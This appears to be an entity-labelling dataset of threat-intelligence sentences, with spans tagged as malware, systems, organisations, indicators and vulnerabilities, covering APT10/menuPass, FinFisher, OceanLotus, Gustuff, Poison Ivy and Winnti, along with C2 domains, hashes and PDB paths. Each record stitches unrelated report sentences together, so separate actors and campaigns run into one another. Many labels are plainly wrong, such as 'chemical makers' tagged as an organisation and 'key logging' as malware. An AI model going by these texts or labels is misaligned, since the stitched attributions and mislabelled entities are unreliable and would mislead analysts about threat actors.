Mandiant assesses that DPRK \u2019s", "spans": [{"start": 103, "end": 112, "label": "Malware"}, {"start": 362, "end": 379, "label": "System"}, {"start": 471, "end": 479, "label": "Organization"}]} {"text": "Analysis of the additional spyware modules is future work . In addition to using PlugX and Poison Ivy ( PIVY ) , both known to be used by the group , they also used a new Trojan called \" ChChes \" by the Japan Computer Emergency Response Team Coordination Center ( JPCERT ) . The routine that reads configuration from resources and decompresses the C2 communication library is then called by temporarily replacing the pointer to CComCriticalSection function with the pointer to that routine . Another detection opportunity identified by Mandiant was source IP addresses that access multiple user accounts in a short period of time recorded in the ns.log files or forwarded logs via syslog .", "spans": [{"start": 81, "end": 86, "label": "System"}, {"start": 91, "end": 101, "label": "System"}, {"start": 104, "end": 108, "label": "System"}, {"start": 142, "end": 147, "label": "Organization"}, {"start": 187, "end": 193, "label": "System"}, {"start": 203, "end": 261, "label": "Organization"}, {"start": 264, "end": 270, "label": "Organization"}, {"start": 348, "end": 350, "label": "System"}, {"start": 428, "end": 447, "label": "System"}, {"start": 556, "end": 687, "label": "Indicator"}]} {"text": "It is evident that the ultimate goal of this program is to steal information . Wapack labs also observed a similar sample targeting Japan in November . Such an obfuscation method makes it difficult to spot it in the code . Additional protections with context to your specific environment and threat data are available from the Firewall Management Center .", "spans": [{"start": 79, "end": 85, "label": "Organization"}]} {"text": "The malware architecture is modular , which means that it can execute plugins . 
MenuPass spoofed several sender email addresses to send spear phishing emails , most notably public addresses associated with the Sasakawa Peace Foundation and The White House . The launcher loads configuration from resources and uses an export from the backdoor DLL to initialize config values in memory . The executable within this not only played a very funny video , but dropped and ran another CozyDuke executable .", "spans": [{"start": 80, "end": 88, "label": "Organization"}, {"start": 210, "end": 235, "label": "Organization"}, {"start": 244, "end": 255, "label": "Organization"}, {"start": 343, "end": 346, "label": "System"}]} {"text": "The plugins are stored in its resource section and can be protected by the same VM . menuPass typically makes use of a mix of DDNS and actor-registered domains in their attack campaigns . Resource P1/1 contains config values , including port number and a registry path . This includes hosting C&C domains that were used by Winnti such as mtrue.com , shenqi[.]kr and zhu[.]kr .", "spans": [{"start": 126, "end": 159, "label": "System"}, {"start": 293, "end": 304, "label": "System"}, {"start": 323, "end": 329, "label": "Organization"}, {"start": 338, "end": 347, "label": "Indicator"}, {"start": 350, "end": 361, "label": "Indicator"}, {"start": 366, "end": 374, "label": "Indicator"}]} {"text": "The sample we analyzed in October , for example , contains a plugin that is able to spy on internet connections , and can even divert some SSL connections and steal data from encrypted traffic . There is not much public information about the APT campaign called menuPass ( also known as Stone Panda and APT10 ) . After the content of resource 0xC8 is decompressed , another function from the backdoor DLL is used to load the C2 communication module to the memory and call its \" CreateInstance \" export . 
The group , which was primarily motivated by profit , is noted for utilizing self - developed technically - proficient tools for their attacks .", "spans": [{"start": 262, "end": 270, "label": "Organization"}, {"start": 287, "end": 298, "label": "Organization"}, {"start": 303, "end": 308, "label": "Organization"}, {"start": 401, "end": 404, "label": "System"}, {"start": 425, "end": 427, "label": "System"}, {"start": 478, "end": 492, "label": "System"}]} {"text": "Some FinFisher variants incorporate an MBR rootkit , the exact purpose of which is not clear . A paper from FireEye in 2013 on several campaigns using PIVY included menuPass as one of them . Finally , the launcher passes control to the main backdoor routine . Iranian APT group Siamesekitten PDF was identified as responsible for a supply chain attack campaign that targeted IT and communication companies in Israel .", "spans": [{"start": 5, "end": 14, "label": "Malware"}, {"start": 39, "end": 50, "label": "Indicator"}, {"start": 108, "end": 115, "label": "Organization"}, {"start": 151, "end": 155, "label": "System"}, {"start": 260, "end": 277, "label": "Organization"}, {"start": 278, "end": 295, "label": "Organization"}, {"start": 332, "end": 360, "label": "Organization"}, {"start": 375, "end": 405, "label": "Organization"}]} {"text": "Quite possibly , this routine targets older platforms like Windows 7 and machines not taking advantage of hardware protections like UEFI and SecureBoot , available on Windows 10 . Believed to have started activity in 2009 and to originate from China , the group initially was known for targeting US and overseas defense contractors but broadened their targeting as time passed . OceanLotus : 0 4 name is read from resource P1/0x64 . 
Symantecs Threat Hunter Team , part of Broadcom , has seen it used in a single attack by a ransomware affiliate that attempted to deploy LockBit on a targets network and then switched to 3AM when LockBit was blocked .", "spans": [{"start": 59, "end": 68, "label": "System"}, {"start": 167, "end": 177, "label": "System"}, {"start": 256, "end": 261, "label": "Organization"}, {"start": 312, "end": 331, "label": "Organization"}, {"start": 379, "end": 389, "label": "Organization"}, {"start": 433, "end": 461, "label": "Organization"}, {"start": 472, "end": 480, "label": "Organization"}, {"start": 524, "end": 544, "label": "Organization"}, {"start": 570, "end": 577, "label": "Malware"}, {"start": 620, "end": 623, "label": "Malware"}, {"start": 629, "end": 636, "label": "Malware"}]} {"text": "Describing this additional piece of code in detail is outside the scope of this analysis and may require a new dedicated blog post . menuPass has targeted individuals and organizations in Japan since at least 2014 , and as the same organizations and academics were largely targeted each month in these attacks , it further shows menuPass is persistent in attempts to compromise their targets . OceanLotus : {12C044FA-A4AB-433B-88A2-32C3451476CE} memory pointer 4 points to a function that spawns another copy of malicious process . Disrupting supply chains , destroying centrifuges and other attacks can be classified as WarDefense driven .", "spans": [{"start": 66, "end": 71, "label": "System"}, {"start": 394, "end": 404, "label": "Organization"}]} {"text": "Defense against FinFisher Exposing as much of FinFisher \u2019 s riddles as possible during this painstaking analysis has allowed us to ensure our customers are protected against this advanced piece of malware . menuPass also heavily favors spear phishing , and so takes steps to socially engineer their spear phishes for maximum appearance of legitimacy . 
OceanLotus : {9E3BD021-B5AD-49DEAE93-F178329EE0FE} C&C URLs varies content is read from resource P1/2 . Part of this can be explained by the fact that 8BASE disproportionately attacked Brazil with 11 attacks last month , while PLAY focused on Switzerland ( 5 ) .", "spans": [{"start": 16, "end": 25, "label": "Malware"}, {"start": 46, "end": 55, "label": "Malware"}, {"start": 352, "end": 362, "label": "Organization"}, {"start": 503, "end": 508, "label": "Organization"}, {"start": 537, "end": 543, "label": "Organization"}, {"start": 579, "end": 583, "label": "Organization"}, {"start": 595, "end": 606, "label": "Organization"}]} {"text": "Windows 10 S devices are naturally protected against FinFisher and other threats thanks to the strong code integrity policies that don \u2019 t allow unknown unsigned binaries to run ( thus stopping FinFisher \u2019 s PE installer ) or loaded ( blocking FinFisher \u2019 s DLL persistence ) . menuPass is an ongoing APT campaign with a broad range of targets and will likely continue to target Japan in the future . OceanLotus : 0 config varies content is read from resource P1/1 . 
In one of our previous blog entries , we covered how the threat actor known as Winnti was using GitHub to spread malware \u2013 a development that shows how the group is starting to evolve and use new attack methods beyond their previous tactics involving targeted attacks against gaming , pharmaceutical , and telecommunications companies .", "spans": [{"start": 0, "end": 10, "label": "System"}, {"start": 53, "end": 62, "label": "Malware"}, {"start": 194, "end": 203, "label": "Malware"}, {"start": 244, "end": 253, "label": "Malware"}, {"start": 401, "end": 411, "label": "Organization"}, {"start": 524, "end": 536, "label": "Organization"}, {"start": 546, "end": 552, "label": "Organization"}, {"start": 619, "end": 628, "label": "Organization"}, {"start": 743, "end": 801, "label": "Organization"}]} {"text": "On Windows 10 , similar code integrity policies can be configured using Windows Defender Application Control . ChopShop1 is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints . OceanLotus : {B578B063-93FB-4A5F-82B4-4E6C5EBD393B} ? 4 0 ( config+0x486 ) . The second path ( /Library / Fonts / ArialUnicode.ttf.md5.1 ) may be used to store logging information related to monitor activity that is described as follows .", "spans": [{"start": 3, "end": 13, "label": "System"}, {"start": 72, "end": 108, "label": "System"}, {"start": 111, "end": 120, "label": "Malware"}, {"start": 157, "end": 174, "label": "Organization"}, {"start": 216, "end": 245, "label": "Malware"}, {"start": 326, "end": 336, "label": "Organization"}, {"start": 403, "end": 533, "label": "Malware"}]} {"text": "Office 365 Advanced Threat Protection secures mailboxes from email campaigns that use zero-day exploits to deliver threats like FinFisher . 
PyCommands , meanwhile , are Python scripts that automate tasks for Immunity Debugger , a popular tool for reverse-engineering malware binaries . OceanLotus : {5035383A-F7B0-424A-9C9A-CA667416BA6F} port number 4 0x1BB ( 443 ) ( config+0x46C ) . The new exploit method bypasses URL rewrite mitigations for the endpoint provided by Microsoft in response to \u2022", "spans": [{"start": 0, "end": 37, "label": "System"}, {"start": 86, "end": 103, "label": "Vulnerability"}, {"start": 128, "end": 137, "label": "Malware"}, {"start": 208, "end": 225, "label": "System"}, {"start": 286, "end": 296, "label": "Organization"}, {"start": 470, "end": 479, "label": "Organization"}]} {"text": "Office 365 ATP blocks unsafe attachments , malicious links , and linked-to files using time-of-click protection . Poison Ivy is a remote access tool that is freely available for download from its official web site at www.poisonivy-rat.com . OceanLotus : {68DDB1F1-E31F-42A9-A35D-984B99ECBAAD} registry path varies SOFTWARE\\Classes\\CLSID\\{57C3E2E2-C18F-4ABF-BAAA-9D17879AB029} . Mandiant is investigating intrusions across multiple verticals , including legal and professional services , technology , and government organizations .", "spans": [{"start": 0, "end": 14, "label": "System"}, {"start": 114, "end": 124, "label": "System"}, {"start": 130, "end": 143, "label": "Malware"}, {"start": 241, "end": 251, "label": "Organization"}, {"start": 453, "end": 528, "label": "Organization"}]} {"text": "Using intel from this research , we have made Office 365 ATP more resistant to FinFisher \u2019 s anti-sandbox checks . First released in 2005 , the tool has gone unchanged since 2008 with v ersion 2.3.2 . The backdoor DLL is stored in the .rdata section of the launcher , compressed with LZMA , and encrypted with RC4 . 
However , given the lack of conclusive evidence , we consider it also possible that a different actor - either with or without permission - reused code associated with the cyber range to develop this malware .", "spans": [{"start": 46, "end": 60, "label": "System"}, {"start": 79, "end": 88, "label": "Malware"}, {"start": 214, "end": 217, "label": "System"}, {"start": 284, "end": 288, "label": "System"}, {"start": 310, "end": 313, "label": "System"}, {"start": 456, "end": 523, "label": "Vulnerability"}]} {"text": "Generic detections , advanced behavioral analytics , and machine learning technologies in Windows Defender Advanced Threat Protection detect FinFisher \u2019 s malicious behavior throughout the attack kill chain and alert SecOps personnel . Poison Ivy includes features common to most Windows-based RATs , including key logging , screen capturing , video capturing , file transfers , system administration , password theft , and traffic relaying . The binary is heavily obfuscated with overlapping blocks of garbage code enclosed in pushf/popf instructions . 
nbtscan.exe", "spans": [{"start": 90, "end": 133, "label": "System"}, {"start": 141, "end": 150, "label": "Malware"}, {"start": 236, "end": 246, "label": "System"}, {"start": 294, "end": 298, "label": "System"}, {"start": 311, "end": 322, "label": "Malware"}, {"start": 325, "end": 341, "label": "Malware"}, {"start": 344, "end": 359, "label": "Malware"}, {"start": 362, "end": 376, "label": "Malware"}, {"start": 379, "end": 400, "label": "Malware"}, {"start": 403, "end": 417, "label": "Malware"}, {"start": 424, "end": 440, "label": "Malware"}, {"start": 554, "end": 565, "label": "System"}]} {"text": "Windows Defender ATP also integrates with the Windows protection stack so that protections from Windows Defender AV and Windows Defender Exploit Guard are reported in Windows Defender ATP portal , enabling SecOps personnel to centrally manage security , and as well as promptly investigate and respond to hostile activity in the network . APT40 was previously reported as TEMP.Periscope and TEMP.Jumper . The DllMain function replaces the pointer to GetModuleHandleA API with a pointer to hook routine that will return the base of the backdoor DLL when called with NULL as parameter ( instead of returing the handle to the launcher DLL ) . 
This fact was apparently unknown to Biderman and other Ashley Madison executives more than a year later when their July 2015 hack was first revealed .", "spans": [{"start": 0, "end": 20, "label": "System"}, {"start": 46, "end": 53, "label": "System"}, {"start": 96, "end": 115, "label": "System"}, {"start": 120, "end": 150, "label": "System"}, {"start": 167, "end": 187, "label": "System"}, {"start": 339, "end": 344, "label": "Organization"}, {"start": 372, "end": 386, "label": "Organization"}, {"start": 391, "end": 402, "label": "Organization"}, {"start": 409, "end": 416, "label": "System"}, {"start": 450, "end": 470, "label": "System"}, {"start": 544, "end": 547, "label": "System"}, {"start": 632, "end": 635, "label": "System"}, {"start": 676, "end": 684, "label": "Organization"}, {"start": 695, "end": 720, "label": "Organization"}]} {"text": "We hope that this writeup of our journey through all the multiple layers of protection , obfuscation , and anti-analysis techniques of FinFisher will be useful to other researchers studying this malware . They move laterally and escalate system privileges to extract sensitive information \u2014 whenever the attacker wants to do so.4 ,5 Because some RATs used in targeted attacks are widely available , determining whether an attack is part of a broader APT campaign can be difficult . The backdoor also contains an export that loads the C2 communication module reflectively to the memory from resource passed as parameter and then calls its \" CreateInstance \" export . 
The availability of such builders allows novice actors to generate their own customized ransomware variants .", "spans": [{"start": 135, "end": 144, "label": "Malware"}, {"start": 304, "end": 312, "label": "Organization"}, {"start": 346, "end": 350, "label": "System"}, {"start": 534, "end": 536, "label": "System"}, {"start": 640, "end": 654, "label": "System"}, {"start": 666, "end": 699, "label": "Vulnerability"}]} {"text": "We believe that an industry-wide collaboration and information-sharing is important in defending customers against this complex piece of malware . In 2011 , three years after the most recent release of PIVY , attackers used the RAT to compromise security firm RSA and steal data about its SecureID authentication system . While we are still in the process of analyzing this backdoor\u2019s full functionality , it seems to be similar to the Remy backdoor described in our previous whitepaper on OceanLotus malware . The group behind the Winnti malware ( which we will call the Winnti group for brevity ) sprung up as a band of traditional cyber crooks , comprising black hats whose technical skills were employed to perpetrate financial fraud .", "spans": [{"start": 202, "end": 206, "label": "System"}, {"start": 209, "end": 218, "label": "Organization"}, {"start": 228, "end": 231, "label": "System"}, {"start": 246, "end": 263, "label": "Organization"}, {"start": 436, "end": 449, "label": "Malware"}, {"start": 490, "end": 500, "label": "Organization"}, {"start": 532, "end": 546, "label": "Malware"}, {"start": 572, "end": 584, "label": "Organization"}, {"start": 622, "end": 646, "label": "Organization"}, {"start": 660, "end": 737, "label": "Organization"}]} {"text": "TUESDAY , APRIL 9 , 2019 Gustuff banking botnet targets Australia EXECUTIVE SUMMARY Cisco Talos has uncovered a new Android-based campaign targeting Australian financial institutions . 
PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . This DLL is stored in the launcher\u2019s resources and compressed with LZMA . Does your organization support the U.S. Military An example would be supply chain management or manufacturing of parts that could be used by the military WarDefense", "spans": [{"start": 25, "end": 32, "label": "Malware"}, {"start": 84, "end": 95, "label": "Organization"}, {"start": 116, "end": 129, "label": "System"}, {"start": 185, "end": 189, "label": "System"}, {"start": 263, "end": 278, "label": "Organization"}, {"start": 281, "end": 300, "label": "Organization"}, {"start": 303, "end": 322, "label": "Organization"}, {"start": 393, "end": 402, "label": "Organization"}, {"start": 410, "end": 432, "label": "Vulnerability"}, {"start": 451, "end": 455, "label": "System"}, {"start": 471, "end": 474, "label": "System"}, {"start": 533, "end": 537, "label": "System"}, {"start": 609, "end": 632, "label": "Organization"}, {"start": 636, "end": 649, "label": "Organization"}, {"start": 685, "end": 704, "label": "Organization"}]} {"text": "As the investigation progressed , Talos came to understand that this campaign was associated with the \" ChristinaMorrow '' text message spam scam previously spotted in Australia . Just recently , PIVY was the payload of a zero-day exploit in Internet Explorer used in what is known as a \" strategic web compromise \" attack against visitors to a U.S. government website and a variety of others . It\u2019s also heavily obfuscated , but in a slightly different way than the backdoor . 
Commands to the remote system , and often the results of those commands , will be embedded within the protocol traffic between the client and server .", "spans": [{"start": 34, "end": 39, "label": "Organization"}, {"start": 196, "end": 200, "label": "System"}, {"start": 222, "end": 238, "label": "Vulnerability"}]} {"text": "Although this malware 's credential-harvest mechanism is not particularly sophisticated , it does have an advanced self-preservation mechanism . The Poison Ivy builder kit allows attackers to customize and build their own PIVY server , which is delivered as mobile code to a target that has been compromised , typically using social engineering . Although it doesn\u2019t contain an internal name , we believe it\u2019s a variant of HttpProv library , as described in the ESET white paper on OceanLotus . We also found a live service selling VPS hosting at secure[.]66[.]to .", "spans": [{"start": 149, "end": 159, "label": "System"}, {"start": 179, "end": 188, "label": "Organization"}, {"start": 192, "end": 233, "label": "Malware"}, {"start": 423, "end": 439, "label": "System"}, {"start": 462, "end": 466, "label": "Organization"}, {"start": 482, "end": 492, "label": "Organization"}, {"start": 547, "end": 563, "label": "Indicator"}]} {"text": "Even though this is not a traditional remote access tool ( RAT ) , this campaign seems to target mainly private users . Attackers can point and click their way through a compromised network and exfiltrate data . This module is used by the backdoor during HTTP/HTTPS communication with the C2 server and has a proxy bypass functionality . 
In the case of ProxyNotShell , the targeted backend service is the Remote PowerShell service .", "spans": [{"start": 120, "end": 129, "label": "Organization"}, {"start": 289, "end": 291, "label": "System"}, {"start": 353, "end": 366, "label": "Vulnerability"}]} {"text": "Aside from the credential stealing , this malware also includes features like the theft of users ' contact list , collecting phone numbers associated names , and files and photos on the device . Commodity RATs also complicate efforts by security professionals to correlate a threat actor 's activity over time\u2014attackers can hide in the sea of malicious activity that also uses Poison Ivy-based malware . OceanLotus : ae1b6f50b166024f960ac792697cd688be9288601f423c15abbc755c66b6daa4 Loader #1 . A Microsoft Exchange server is composed of two major components : the frontend , also known as the Client Access Service , and the backend .", "spans": [{"start": 205, "end": 209, "label": "System"}, {"start": 275, "end": 287, "label": "Organization"}, {"start": 377, "end": 401, "label": "System"}, {"start": 404, "end": 414, "label": "Organization"}, {"start": 417, "end": 481, "label": "Indicator"}, {"start": 496, "end": 521, "label": "System"}, {"start": 593, "end": 614, "label": "System"}]} {"text": "But that does n't mean companies and organizations are out of the woods . This report is an initial public release of research PwC UK and BAE Systems have conducted into new , sustained global campaigns by an established threat actor against managed IT service providers and their clients as well as several directly targeted organisations in Japan . OceanLotus : 0ee693e714be91fd947954daee85d2cd8d3602e9d8a840d520a2b17f7c80d999 Loader #1 . 
None PIEHOP is a disruption tool written in Python and packaged with PyInstaller that is capable of connecting to a user - supplied remote MSSQL server for uploading files and issuing remote commands to a RTU .", "spans": [{"start": 127, "end": 133, "label": "Organization"}, {"start": 138, "end": 149, "label": "Organization"}, {"start": 221, "end": 233, "label": "Organization"}, {"start": 242, "end": 270, "label": "Organization"}, {"start": 351, "end": 361, "label": "Organization"}, {"start": 364, "end": 428, "label": "Indicator"}, {"start": 446, "end": 452, "label": "System"}, {"start": 453, "end": 649, "label": "Malware"}]} {"text": "They should still be on the lookout for these kinds of trojans , as the attackers could target corporate accounts that contain large amounts of money . Since late 2016 , PwC UK and BAE Systems have been assisting victims of a new cyber espionage campaign conducted by APT10 . OceanLotus : a2719f203c3e8dcdcc714dd3c1b60a4cbb5f7d7296dbb88b2a756d85bf0e9c1e Loader #1 . KillNet Appears to Increase Capabilities", "spans": [{"start": 170, "end": 176, "label": "Organization"}, {"start": 181, "end": 192, "label": "Organization"}, {"start": 268, "end": 273, "label": "Organization"}, {"start": 276, "end": 286, "label": "Organization"}, {"start": 289, "end": 353, "label": "Indicator"}, {"start": 366, "end": 373, "label": "Organization"}]} {"text": "The information collected by the malware and the control over the victim 's mobile device allows their operators to perform more complex social engineering attacks . The campaign , which we refer to as Operation Cloud Hopper , has targeted managed IT service providers ( MSPs ) , allowing APT10 unprecedented potential access to the intellectual property and sensitive data of those MSPs and their clients globally . OceanLotus : 4c02b13441264bf18cc63603b767c3d804a545a60c66ca60512ee59abba28d4d Loader #2 . 
It is possible that the malware was used to support exercises such as the ones hosted by Rostelecom - Solar in 2021 in collaboration with the Russian Ministry of Energy or in 2022 for the ( SPIEF ) .", "spans": [{"start": 240, "end": 268, "label": "Organization"}, {"start": 271, "end": 275, "label": "Organization"}, {"start": 289, "end": 294, "label": "Organization"}, {"start": 383, "end": 387, "label": "Organization"}, {"start": 417, "end": 427, "label": "Organization"}, {"start": 430, "end": 494, "label": "Indicator"}, {"start": 596, "end": 614, "label": "Organization"}, {"start": 649, "end": 675, "label": "Organization"}, {"start": 697, "end": 702, "label": "Organization"}]} {"text": "A motivated attacker can use this trojan to harvest usernames and passwords and then reuse them to login into the organization 's system where the victim works . APT10 ceased its use of the Poison Ivy malware family after a 2013 FireEye report , which comprehensively detailed the malware 's functionality and features , and its use by several China-based threat actors , including APT10 . OceanLotus : e0fc83e57fbbb81cbd07444a61e56e0400f7c54f80242289779853e38beb341e Loader #2 . The Budworm advanced persistent threat APT group continues to actively develop its toolset .", "spans": [{"start": 162, "end": 167, "label": "Organization"}, {"start": 190, "end": 215, "label": "System"}, {"start": 229, "end": 236, "label": "Organization"}, {"start": 356, "end": 369, "label": "Organization"}, {"start": 382, "end": 387, "label": "Organization"}, {"start": 390, "end": 400, "label": "Organization"}, {"start": 403, "end": 467, "label": "Indicator"}, {"start": 480, "end": 528, "label": "Organization"}, {"start": 563, "end": 570, "label": "System"}]} {"text": "This is a good example where two-factor authentication based on SMS would fail since the attacker can read the SMS . 
APT10 primarily used PlugX malware from 2014 to 2016 , progressively improving and deploying newer versions , while simultaneously standardising their command and control function . OceanLotus : cd67415dd634fd202fa1f05aa26233c74dc85332f70e11469e02b370f3943b1d Loader #2 . Additionally , by using leaked source code , threat actors can confuse or mislead investigators , as security professionals may be more likely to misattribute the activity to the wrong actor .", "spans": [{"start": 117, "end": 122, "label": "Organization"}, {"start": 138, "end": 151, "label": "System"}, {"start": 299, "end": 309, "label": "Organization"}, {"start": 312, "end": 376, "label": "Indicator"}, {"start": 490, "end": 512, "label": "Organization"}, {"start": 535, "end": 579, "label": "Vulnerability"}]} {"text": "Corporations can protect themselves from these side-channel attacks by deploying client-based two-factor authentication , such as Duo Security . PwC UK and BAE Systems assess it is highly likely that APT10 is a China-based threat actor with a focus on espionage and wide ranging information collection . OceanLotus : 9112f23e15fdcf14a58afa424d527f124a4170f57bd7411c82a8cdc716f6e934 Loader #2 . Some researchers believe that it is linked to TA570 because of the similarity of delivering method between it and trojan .", "spans": [{"start": 130, "end": 142, "label": "System"}, {"start": 145, "end": 151, "label": "Organization"}, {"start": 156, "end": 167, "label": "Organization"}, {"start": 200, "end": 205, "label": "Organization"}, {"start": 223, "end": 235, "label": "Organization"}, {"start": 252, "end": 261, "label": "Organization"}, {"start": 304, "end": 314, "label": "Organization"}, {"start": 317, "end": 381, "label": "Indicator"}, {"start": 399, "end": 410, "label": "Organization"}, {"start": 440, "end": 445, "label": "Organization"}, {"start": 457, "end": 514, "label": "Indicator"}]} {"text": "One of the most impressive features of this malware is its resilience . 
APT10 is known to have exfiltrated a high volume of data from multiple victims , exploiting compromised MSP networks , and those of their customers , to stealthily move this data around the world . OceanLotus : ecaeb1b321472f89b6b3c5fb87ec3df3d43a10894d18b575d98287b81363626f Loader #2 . The adversary may drop or create malware , tools , or other non - native files on a target system to accomplish this , potentially leaving behind traces of malicious activities .", "spans": [{"start": 72, "end": 77, "label": "Organization"}, {"start": 176, "end": 188, "label": "System"}, {"start": 210, "end": 219, "label": "Organization"}, {"start": 270, "end": 280, "label": "Organization"}, {"start": 283, "end": 347, "label": "Indicator"}, {"start": 506, "end": 536, "label": "Indicator"}]} {"text": "If the command and control ( C2 ) server is taken down , the malicious operator can still recover the malware control by sending SMS messages directly to the infected devices . APT10 , a name originally coined by FireEye , is also referred to as Red Apollo by PwC UK , CVNX by BAE Systems , Stone Panda by CrowdStrike , and menuPass Team more broadly in the public domain . OceanLotus : 478cc5faadd99051a5ab48012c494a807c7782132ba4f33b9ad9229a696f6382 Loader #2 . 
Rhysida , a new ransomware gang claiming to be a \" cybersecurity team , \" has been in operation since May 17 , 2023 , making headlines for their high - profile attack against the Chilean Army .", "spans": [{"start": 177, "end": 182, "label": "Organization"}, {"start": 213, "end": 220, "label": "Organization"}, {"start": 246, "end": 256, "label": "Organization"}, {"start": 260, "end": 266, "label": "Organization"}, {"start": 269, "end": 273, "label": "Organization"}, {"start": 277, "end": 288, "label": "Organization"}, {"start": 291, "end": 302, "label": "Organization"}, {"start": 306, "end": 317, "label": "Organization"}, {"start": 324, "end": 337, "label": "Organization"}, {"start": 374, "end": 384, "label": "Organization"}, {"start": 387, "end": 451, "label": "Indicator"}, {"start": 464, "end": 471, "label": "Organization"}, {"start": 643, "end": 655, "label": "Organization"}]} {"text": "This makes the taking down and recovery of the network much harder and poses a considerable challenge for defenders . The threat actor has previously been the subject of a range of open source reporting , including most notably a report by FireEye comprehensively detailing the threat actor 's use of the Poison Ivy malware family and blog posts by Trend Micro3 similarly detailing the use of EvilGrab malware . OceanLotus : 72441fe221c6a25b3792d18f491c68254e965b0401a845829a292a1d70b2e49a Payload PNG ( loader #1 ) . 
Mandiant Intelligence assesses with high confidence that operations for which the pro - Russia hacktivist collective KillNet has claimed responsibility consistently mirror Russian strategic objectives , although we have not yet uncovered direct evidence of the collective \u2019s collaboration with or direction from Russian security services .", "spans": [{"start": 122, "end": 134, "label": "Organization"}, {"start": 240, "end": 247, "label": "Organization"}, {"start": 278, "end": 290, "label": "Organization"}, {"start": 305, "end": 330, "label": "System"}, {"start": 349, "end": 361, "label": "Organization"}, {"start": 393, "end": 409, "label": "System"}, {"start": 412, "end": 422, "label": "Organization"}, {"start": 425, "end": 489, "label": "Indicator"}, {"start": 518, "end": 539, "label": "Organization"}, {"start": 600, "end": 642, "label": "Organization"}]} {"text": "THE CAMPAIGN The malware 's primary infection vector is SMS . The threat actor has previously been the subject of a range of open source reporting , including most notably a report by FireEye comprehensively detailing the threat actor 's use of the Poison Ivy malware family and blog posts by Trend Micro similarly detailing the use of EvilGrab malware . OceanLotus : 11b4c284b3c8b12e83da0b85f59a589e8e46894fa749b847873ed6bab2029c0f Payload PNG ( loader #2 ) . 
Threat actors are always looking to expand the strategies they use , thus security practices and solutions that work for less organized cybercriminals might not work for determined groups who are willing to spend time , resources and manpower to accomplish their goals .", "spans": [{"start": 66, "end": 78, "label": "Organization"}, {"start": 184, "end": 191, "label": "Organization"}, {"start": 222, "end": 234, "label": "Organization"}, {"start": 249, "end": 274, "label": "System"}, {"start": 293, "end": 304, "label": "Organization"}, {"start": 336, "end": 352, "label": "System"}, {"start": 355, "end": 365, "label": "Organization"}, {"start": 368, "end": 432, "label": "Indicator"}, {"start": 461, "end": 474, "label": "Organization"}]} {"text": "Just like the old-school mail worms that used the victim 's address book to select the next victims , this banking trojan 's activation cycle includes the exfiltration of the victim 's address book . APT10 has been in operation since at least 2009 , and has evolved its targeting from an early focus on the US defence industrial base ( DIB )1 and the technology and telecommunications sector , to a widespread compromise of multiple industries and sectors across the globe , most recently with a focus on MSPs . OceanLotus : d78a83e9bf4511c33eaab9a33ebf7ccc16e104301a7567dd77ac3294474efced Payload PNG ( loader #2 ) . 
TeamTNT has used an IRC bot for C2 communications.[13 ] Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level .", "spans": [{"start": 60, "end": 72, "label": "System"}, {"start": 200, "end": 205, "label": "Organization"}, {"start": 351, "end": 361, "label": "Organization"}, {"start": 366, "end": 391, "label": "Organization"}, {"start": 505, "end": 509, "label": "Organization"}, {"start": 512, "end": 522, "label": "Organization"}, {"start": 525, "end": 589, "label": "Indicator"}, {"start": 618, "end": 625, "label": "Organization"}, {"start": 638, "end": 645, "label": "System"}, {"start": 650, "end": 652, "label": "System"}]} {"text": "The trojan will receive instructions from the C2 to spread . The research and ongoing tracking of APT10 by both PwC UK and BAE . OceanLotus : E:\\ProjectGit\\SHELL\\BrokenSheild\\BrokenShieldPrj\\Bin\\x86\\Release\\DllExportx86.pdb Loader #1 . AdFind A publicly available tool that is used to query Active Directory .", "spans": [{"start": 98, "end": 103, "label": "Organization"}, {"start": 112, "end": 118, "label": "Organization"}, {"start": 123, "end": 126, "label": "Organization"}, {"start": 129, "end": 139, "label": "Organization"}, {"start": 142, "end": 223, "label": "Indicator"}, {"start": 236, "end": 242, "label": "System"}]} {"text": "Spread command from C2 The victim receives the command sendSMSMass . APT10 has been in operation since at least 2009 , and has evolved its targeting from an early focus on the US defence industrial base ( DIB ) and the technology and telecommunications sector , to a widespread compromise of multiple industries and sectors across the globe , most recently with a focus on MSPs . OceanLotus : C:\\Users\\Meister\\Documents\\Projects\\BrokenShield\\Bin\\x86\\Release\\BrokenShield.pdb Loader #2 . 
We believe this is a different campaign and threat actor altogether .", "spans": [{"start": 69, "end": 74, "label": "Organization"}, {"start": 219, "end": 229, "label": "Organization"}, {"start": 234, "end": 259, "label": "Organization"}, {"start": 373, "end": 377, "label": "Organization"}, {"start": 380, "end": 390, "label": "Organization"}, {"start": 393, "end": 474, "label": "Indicator"}, {"start": 518, "end": 526, "label": "Organization"}, {"start": 531, "end": 543, "label": "Organization"}]} {"text": "Usually , this message targets four or five people at a time . PwC UK has been engaged in supporting investigations linked to APT10 compromises . OceanLotus : kermacrescen.com 7244 . Not only can email accounts contain access to sensitive data , they can provide an even more convincing persona that is used to execute BEC campaigns impersonating other users to further collect credentials and potentially gain access to other systems .", "spans": [{"start": 63, "end": 69, "label": "Organization"}, {"start": 126, "end": 131, "label": "Organization"}, {"start": 146, "end": 156, "label": "Organization"}, {"start": 159, "end": 175, "label": "Indicator"}, {"start": 319, "end": 332, "label": "Organization"}]} {"text": "The body contains a message and URL . As a result of our analysis of APT10 's activities , we believe that it almost certainly benefits from significant staffing and logistical resources , which have increased over the last three years , with a significant step-change in 2016 . OceanLotus : stellefaff.com 7244 . 
